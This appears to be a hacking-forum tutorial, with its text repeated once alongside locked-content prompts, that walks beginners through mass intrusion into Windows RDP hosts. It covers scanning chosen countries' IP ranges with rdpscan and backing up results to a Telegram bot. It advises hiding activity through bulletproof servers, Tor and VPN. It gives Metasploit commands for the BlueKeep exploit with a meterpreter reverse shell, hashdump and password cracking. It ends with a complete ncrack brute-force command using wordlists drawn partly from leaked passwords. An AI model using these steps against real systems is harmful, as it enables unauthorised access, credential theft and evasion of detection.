No proprietary software! Everything is explained so simply that even an absolute beginner will understand it the first time!
RDP (Remote Desktop Protocol) is a protocol developed by Microsoft. It allows a user to connect to a remote computer over a network and control it as if he were physically behind it.
In simple terms, it is like a computer running Windows, but on a remote machine.
A brute force attack, in turn, is a method of trying login and password combinations. It exploits the prevalence of identical or weak passwords used by different people.
In simple terms, this is when people find it difficult to come up with complex passwords, and they, like bad actors, take advantage of this.
On the network, connected devices have serial numbers called IP addresses. Each address has a little more than 65 thousand ports. It is easier to imagine this using an analogy: if the world is a huge planet of shopping malls, then IP addresses are the addresses of the shopping malls, and the ports are specific stores inside them. The standard port for RDP is 3389.
Both on this planet and in the network there are territories and their sovereigns. Everyone can choose their own by the top-level domain TLD-Country-Bounds .
Having made the choice, we convert the TLD to IP addresses using data from the repository: RIR-IP by country .
Scanning the ports is step number two.
Masscan instantly detects open ports, but there are some nuances. Ports can be in two states: open or closed. However, they can also be open, but not have the RDP service running.
Masscan really quickly detects open ports, but the vast majority of them either do not have the RDP service or are closed by a firewall. In short, such hosts are completely unsuitable for use in the task, which becomes clear only after checking nmap. And nmap, in turn, takes time.
Thus, the masscan + nmap bundle (or another service identifier) can be used, but I found a much more interesting option.
GitHub, the moon of my life, offers a solution that I use: GitHub - robertdavidgraham/rdpscan: A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability .
This is actually a scanner for a specific vulnerability CVE-2019-0708, known as BlueKeep. Surprisingly, despite its age, hosts with this vulnerability are still showing up in the results. I'll talk about how to handle such hosts later.
The important thing here is that this code can be used to detect addresses with the RDP service running.
Let's take a look at the documentation for the program from the repository. It accepts a range of IP addresses and for each address it produces a log that can be in one of several states:
The documentation states that the program can work in conjunction with masscan to speed up the check, although it works very quickly on its own. Moreover, if you look at the code a little, it becomes clear that it uses some code fragments from masscan.
Clone the repository. To build the executable file, you need to enter the make command in the program folder. You may need to install additional packages. If errors occur, just copy them and send them to ChatGPT for correction.
Sometimes the program's workflow needs to be tweaked. For example, if the program does not work with text files, you can write a small script yourself in any programming language - Python, Bash, Go.
The program works with IP address ranges. At the stage of their collection, we formed a text file. A little automation: the program takes data from the file line by line, and the script also saves the results of the program's work to another file. Similar behavior can be achieved by simply redirecting the output stream using >> res.txt on Linux machines in the terminal.
Pay attention to the line cmd := exec.Command("./rdpscan", "--workers", "350", ip). By increasing the number (the third argument), you increase the speed of the program. This parameter is responsible for the number of simultaneously running goroutines. The value 350 is a small number, but with it the program works fast enough for a simple port scanner, because the brute force attack itself will take more time.
At this stage, it is advisable to run everything on a remote machine. The problem with anonymity is that it is not abstract: everything on the network is literally physical devices. Therefore, is anonymity possible? Or is Stolyarov not so crazy, but just took it too close to heart?
Where can I find abuse-resistant servers - as we say, or bulletproof - like they do? Take any Ubuntu Server, set up VNC on it (this is like RDP for Windows) and open access from all IPs, login by login and password, not forgetting to keep logs. You look at the logs twice a day. You check the IP at https://whatismyipaddress.com/ . You are not interested in every address, but the one that will try to pick up the login and password, that is, actually trying to hack. You check it at https://whatismyipaddress.com/ and google the ISP - congratulations, you found a bulletproof!
But what if you are not sure about the server? Backup.
This code solves the following problem - saving the results and backing them up using a Telegram bot. The compiled rdpscan file should be in the same folder as the main.go script.
To do this, you need to create a Telegram bot and find out the chat ID. The instructions can be found, for example, here: Create a Telegram Bot and Obtain the Chat ID - Step-by-Step Guide - YouTube .
At certain times (at a specified interval), the code creates (or rewrites) an archive containing the program's text log, as well as addresses that have already been checked. After that, the archive is sent as a message to the bot. The code synchronizes access to critical sections using mutexes.
The parameters that need to be configured:
The bot needs to be run as a separate script so that it can receive messages. The bot script also needs to specify the telegramToken.
The resulting log file can be processed using a script that divides hosts into two categories:
At the output, you will receive their lists in the form of IP addresses.
The script is launched in the folder where the output.txt file is located. As a result of executing the script, two files are created:
Speaking from practice - taking 20 IP ranges, we managed to find a little more than one thousand one hundred hosts for brute force, and one host with BlueKeep. The check took several hours.
Regarding concealing work on a VPS. You can use TOR and VPN. For example, the check script works great with torify running on top, which provides Tor traffic. In general, traffic can be sent through a VPN, but this is already theoretical information. It's just that brute force-type activity can trigger the provider, and large traffic on a VPN may not be so suspicious. Of course, brute force is generally a large volume of traffic, but globally, VPN is not very suspicious, many product IT companies use VPN for employees for security purposes. Tor traffic is probably more suspicious, but you remember that all servers are physical computers?
Do not forget to use the nohup command, otherwise the running scripts will stop working as soon as the SSH session ends.
Well, first, let's deal with the hosts under CVE-2019-0708. Firstly, this is an old vulnerability, and it is possible that the hosts can act as honeypots. But still, in a few words, this is a tricky buffer overflow vulnerability, and quite a lot of materials have been written about it. I want to answer the question of how exactly to exploit it.
After checking the number of hosts in Shodan, you can use the vuln:cve-2019-0708 dork. After scanning the entire network, more hosts will be found than Shodan shows!
Let's use Metasploit. Install and run it with the msfconsole command. Select the exploit with the use exploit/windows/rdp/cve_2019_0708_bluekeep_rce command, set RHOST as the IP address on which the scanner detected the vulnerability: set RHOSTS 127.0.0.1. As a payload, we enter the command set PAYLOAD windows/x64/meterpreter/reverse_tcp. Set LHOST to the IP address of the machine from which the exploitation occurs: set LHOST. Next, enter the exploit command. If everything went well (although this is not always the case), we get a meterpreter session. Then we extract the hashes with the hashdump command. After that, we remove them using Hashcat or John the Ripper and get the connection credentials. Here is a good demonstration: BlueKeep RDP Vulnerability CVE-2019-0708 Exploit in Metasploit - Video 2021 with InfoSec Pat.
The next step is to collect password and login databases. I would not recommend using databases that, for example, lack special characters and capital letters, such as this one: https://github.com/jeanphorn/wordlist/bl...sslist.txt . In my opinion, a good repository is https://github.com/danielmiessler/SecLis.../Passwords . You can also find good logins here: https://github.com/danielmiessler/SecLis.../Usernames . In addition, the database can be compiled from previously leaked passwords of other thematic sites, accesses or logs.
After downloading several files, we combine them using a script, leaving only unique lines of at least 4 characters long, additionally randomizing them.
The final step is to run brute force. I suggest using the ncrack utility. I haven't personally compared it, but I read an article where ncrack outperformed Hydra and Medusa in RDP brute force speed.
Command: ncrack -v -f -CL -U usernames.txt -P passwords.txt -iL targets.txt -p 3389 -oN results.txt
The -f flag will stop the check at the first successful result found. The results will be written to a text file. You can check in a couple of days. It is also recommended to experiment with the `-T` parameters.
Bye.
RDP (Remote Desktop Protocol) is a protocol developed by Microsoft. It allows a user to connect to a remote computer over a network and control it as if he were physically behind it.
In simple terms, it is like a computer running Windows, but on a remote machine.
A brute force attack, in turn, is a method of trying login and password combinations. It exploits the prevalence of identical or weak passwords used by different people.
In simple terms, this is when people find it difficult to come up with complex passwords, and they, like bad actors, take advantage of this.
On the network, connected devices have serial numbers called IP addresses. Each address has a little more than 65 thousand ports. It is easier to imagine this using an analogy: if the world is a huge planet of shopping malls, then IP addresses are the addresses of the shopping malls, and the ports are specific stores inside them. The standard port for RDP is 3389.
Both on this planet and in the network there are territories and their sovereigns. Everyone can choose their own by the top-level domain TLD-Country-Bounds .
Having made the choice, we convert the TLD to IP addresses using data from the repository: RIR-IP by country .
Scanning the ports is step number two.
Masscan instantly detects open ports, but there are some nuances. Ports can be in two states: open or closed. However, they can also be open, but not have the RDP service running.
Masscan really quickly detects open ports, but the vast majority of them either do not have the RDP service or are closed by a firewall. In short, such hosts are completely unsuitable for use in the task, which becomes clear only after checking nmap. And nmap, in turn, takes time.
Thus, the masscan + nmap bundle (or another service identifier) can be used, but I found a much more interesting option.
GitHub, the moon of my life, offers a solution that I use: GitHub - robertdavidgraham/rdpscan: A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability .
This is actually a scanner for a specific vulnerability CVE-2019-0708, known as BlueKeep. Surprisingly, despite its age, hosts with this vulnerability are still showing up in the results. I'll talk about how to handle such hosts later.
The important thing here is that this code can be used to detect addresses with the RDP service running.
Let's take a look at the documentation for the program from the repository. It accepts a range of IP addresses and for each address it produces a log that can be in one of several states:
- UNKNOWN — we do not work with such addresses.
- VULNERABLE — hosts with vulnerability CVE-2019-0708. We save them, we will talk about them later.
- SAFE - the host is not vulnerable to BlueKeep, but may be suitable for further brute force attack if the state is specified as SAFE or SAFE - CredSSP/NLA.
- SAFE - not RDP - for obvious reasons not suitable for brute force attack.
The documentation states that the program can work in conjunction with masscan to speed up the check, although it works very quickly on its own. Moreover, if you look at the code a little, it becomes clear that it uses some code fragments from masscan.
Clone the repository. To build the executable file, you need to enter the make command in the program folder. You may need to install additional packages. If errors occur, just copy them and send them to ChatGPT for correction.
Sometimes the program's workflow needs to be tweaked. For example, if the program does not work with text files, you can write a small script yourself in any programming language - Python, Bash, Go.
The program works with IP address ranges. At the stage of their collection, we formed a text file. A little automation: the program takes data from the file line by line, and the script also saves the results of the program's work to another file. Similar behavior can be achieved by simply redirecting the output stream using >> res.txt on Linux machines in the terminal.
🔒 Content Locked
You must reply to this thread to unlock the content, or Upgrade your account here for instant access.
Pay attention to the line cmd := exec.Command("./rdpscan", "--workers", "350", ip). By increasing the number (the third argument), you increase the speed of the program. This parameter is responsible for the number of simultaneously running goroutines. The value 350 is a small number, but with it the program works fast enough for a simple port scanner, because the brute force attack itself will take more time.
At this stage, it is advisable to run everything on a remote machine. The problem with anonymity is that it is not abstract: everything on the network is literally physical devices. Therefore, is anonymity possible? Or is Stolyarov not so crazy, but just took it too close to heart?
Where can I find abuse-resistant servers - as we say, or bulletproof - like they do? Take any Ubuntu Server, set up VNC on it (this is like RDP for Windows) and open access from all IPs, login by login and password, not forgetting to keep logs. You look at the logs twice a day. You check the IP at https://whatismyipaddress.com/ . You are not interested in every address, but the one that will try to pick up the login and password, that is, actually trying to hack. You check it at https://whatismyipaddress.com/ and google the ISP - congratulations, you found a bulletproof!
But what if you are not sure about the server? Backup.
This code solves the following problem - saving the results and backing them up using a Telegram bot. The compiled rdpscan file should be in the same folder as the main.go script.
🔒 Content Locked
You must reply to this thread to unlock the content, or Upgrade your account here for instant access.
To do this, you need to create a Telegram bot and find out the chat ID. The instructions can be found, for example, here: Create a Telegram Bot and Obtain the Chat ID - Step-by-Step Guide - YouTube .
At certain times (at a specified interval), the code creates (or rewrites) an archive containing the program's text log, as well as addresses that have already been checked. After that, the archive is sent as a message to the bot. The code synchronizes access to critical sections using mutexes.
The parameters that need to be configured:
- telegramToken — your bot's token.
- chatID — ID of the chat to send messages to.
- intervalMinutes - the time interval, set to 60 minutes by default (this can be changed).
The bot needs to be run as a separate script so that it can receive messages. The bot script also needs to specify the telegramToken.
🔒 Content Locked
You must reply to this thread to unlock the content, or Upgrade your account here for instant access.
The resulting log file can be processed using a script that divides hosts into two categories:
- hosts with vulnerability
- hosts for brute force
At the output, you will receive their lists in the form of IP addresses.
The script is launched in the folder where the output.txt file is located. As a result of executing the script, two files are created:
- forBruteIp.txt — list of hosts for brute force,
- BlueKeep.txt - list of hosts with BlueKeep vulnerability.
🔒 Content Locked
You must reply to this thread to unlock the content, or Upgrade your account here for instant access.
Speaking from practice - taking 20 IP ranges, we managed to find a little more than one thousand one hundred hosts for brute force, and one host with BlueKeep. The check took several hours.
Regarding concealing work on a VPS. You can use TOR and VPN. For example, the check script works great with torify running on top, which provides Tor traffic. In general, traffic can be sent through a VPN, but this is already theoretical information. It's just that brute force-type activity can trigger the provider, and large traffic on a VPN may not be so suspicious. Of course, brute force is generally a large volume of traffic, but globally, VPN is not very suspicious, many product IT companies use VPN for employees for security purposes. Tor traffic is probably more suspicious, but you remember that all servers are physical computers?
Do not forget to use the nohup command, otherwise the running scripts will stop working as soon as the SSH session ends.
Well, first, let's deal with the hosts under CVE-2019-0708. Firstly, this is an old vulnerability, and it is possible that the hosts can act as honeypots. But still, in a few words, this is a tricky buffer overflow vulnerability, and quite a lot of materials have been written about it. I want to answer the question of how exactly to exploit it.
After checking the number of hosts in Shodan, you can use the vuln:cve-2019-0708 dork. After scanning the entire network, more hosts will be found than Shodan shows!
Let's use Metasploit. Install and run it with the msfconsole command. Select the exploit with the use exploit/windows/rdp/cve_2019_0708_bluekeep_rce command, set RHOST as the IP address on which the scanner detected the vulnerability: set RHOSTS 127.0.0.1. As a payload, we enter the command set PAYLOAD windows/x64/meterpreter/reverse_tcp. Set LHOST to the IP address of the machine from which the exploitation occurs: set LHOST. Next, enter the exploit command. If everything went well (although this is not always the case), we get a meterpreter session. Then we extract the hashes with the hashdump command. After that, we remove them using Hashcat or John the Ripper and get the connection credentials. Here is a good demonstration: BlueKeep RDP Vulnerability CVE-2019-0708 Exploit in Metasploit - Video 2021 with InfoSec Pat.
The next step is to collect password and login databases. I would not recommend using databases that, for example, lack special characters and capital letters, such as this one: https://github.com/jeanphorn/wordlist/bl...sslist.txt . In my opinion, a good repository is https://github.com/danielmiessler/SecLis.../Passwords . You can also find good logins here: https://github.com/danielmiessler/SecLis.../Usernames . In addition, the database can be compiled from previously leaked passwords of other thematic sites, accesses or logs.
After downloading several files, we combine them using a script, leaving only unique lines of at least 4 characters long, additionally randomizing them.
🔒 Content Locked
You must reply to this thread to unlock the content, or Upgrade your account here for instant access.
The final step is to run brute force. I suggest using the ncrack utility. I haven't personally compared it, but I read an article where ncrack outperformed Hydra and Medusa in RDP brute force speed.
Command: ncrack -v -f -CL -U usernames.txt -P passwords.txt -iL targets.txt -p 3389 -oN results.txt
The -f flag will stop the check at the first successful result found. The results will be written to a text file. You can check in a couple of days. It is also recommended to experiment with the `-T` parameters.
Bye.
![[Image: NvSkS89.gif]](https://i.imgur.com/NvSkS89.gif)
![[Image: QKLOi8j.gif]](https://i.imgur.com/QKLOi8j.gif)
![[Image: whNlfLi.gif]](https://i.imgur.com/whNlfLi.gif)
![[Image: 9Oq6tka.gif]](https://i.imgur.com/9Oq6tka.gif)
![[Image: A0gE4KJ.gif]](https://i.imgur.com/A0gE4KJ.gif)
![[Image: htlcJoL.png]](https://i.imgur.com/htlcJoL.png)